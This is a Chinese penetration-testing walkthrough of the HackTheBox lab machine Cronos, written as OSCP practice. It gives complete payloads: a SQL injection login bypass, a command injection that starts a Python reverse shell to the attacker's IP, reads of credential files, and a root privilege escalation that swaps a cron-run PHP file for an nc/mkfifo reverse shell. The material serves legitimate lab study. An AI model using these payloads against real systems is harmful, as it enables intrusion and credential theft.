渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

admin
admin
admin
138635
文章
114
评论
2022年11月21日16:48:24评论35 views字数 1937阅读6分27秒阅读模式

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

靶机信息

靶机地址:

 https://app.hackthebox.com/machines/Cronos

靶场: HackTheBox.com

靶机名称:Cronos

难度: 中等(不知道官方怎么定的)

提示信息:

 

目标: user.txt和root.txt

实验环境

 攻击机:Kali 10.10.16.6
 
 靶机:10.10.10.13

信息收集

扫描端口

扫描靶机开放的服务端口

 sudo nmap -p- 10.10.10.13

漏张图

 sudo nmap -sV -sC -p22,53,80 10.10.10.13 -oN nmap.log

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

发现靶机开放22(SSH),53(DNS),80(HTTP),未发现敏感信息,先来看看80端口

TCP:80(HTTP)

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

访问后是apache默认页面,做个目录扫描

 gobuster dir -u http://10.10.10.13 -w ../../Dict/SecLists/Discovery/Web-Content/common.txt -x html,php,txt

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

目录扫描同样未发现敏感信息,主机开放53端口猜测需要绑定域名,再来看看53端口。

TCP:53(DNS)

 nslookup
 server 10.10.10.13
 10.10.10.13

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

发现域名cronos.htb,继续

 dig axfr cronos.htb @10.10.10.13

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

发现多个子域名,绑定后尝试访问

sudo vim /etc/hosts

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

手动检测后发现存在2个站点cronos.htb和admin.cronos.htb

http://cronos.htb/

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

http://admin.cronos.htb/

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

来看看admin.coronos.htb,登录位置渗透见2种方法密码暴破、sql注入,由于不清楚账号是什么直接上注入

漏洞利用(Exploitation)

SQL注入

payload

admin' or 1=1 -- -

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

提交后直接登录成功,登录后面页面是一个网络检测功能页面,来看看是否存在命令执行漏洞

命令注入漏洞

8.8.8.8 &id

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

存在命令注入漏洞,尝试反弹shell到攻击机

1。攻击机监听4444端口

sudo nc -lvvp 443

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

2。利用命令注入漏洞反弹shell,在执行前先看看有哪些可利用的工具

127.0.0.1 &which python

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

发现存在python,利用python反弹shell

127.0.0.1 &python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

反弹成功,来找找敏感信息

cat /var/www/admin/config.php

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

config.php文件中发现数据库账号密码

cat /var/www/laravel/config/database.php

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

在/var/www/laravel/config目录下的database.php中发现另一组数据库账号密码

cat /home/noulis/user.txt

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

在noulis用户目录下发现user.txt,拿到第1个flag,再来看看如何提权。

权限提升(Privilege Escalation)

cat /etc/crontab

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

在定时任务中发现以root权限执行的php脚本,来看看这个脚本内容

cat /var/www/laravel/artisan

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

ls -al /var/www/laravel/artisan

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

看到只是一个正常的php自动加载的脚本,但是我们有修改权限。新建一个反弹shell脚本并替换/var/www/laravel/artisan文件

cd /tmp
echo "<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.6 4444 >/tmp/f');?>" >artisan

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

替换artisan

cp /tmp/artisan /var/www/laravel/artisan
ls -al artisan
cat artisan

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

替换完成,攻击机监听4444端口并等待反向连接

nc -lvvp 4444

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

反弹成功,来找下flag

cat /root/root.txt

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

拿到root.txt,游戏结束

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月21日16:48:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试靶机练习No.148 HTB:Cronos(OSCP Prep)http://cn-sec.com/archives/1420820.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息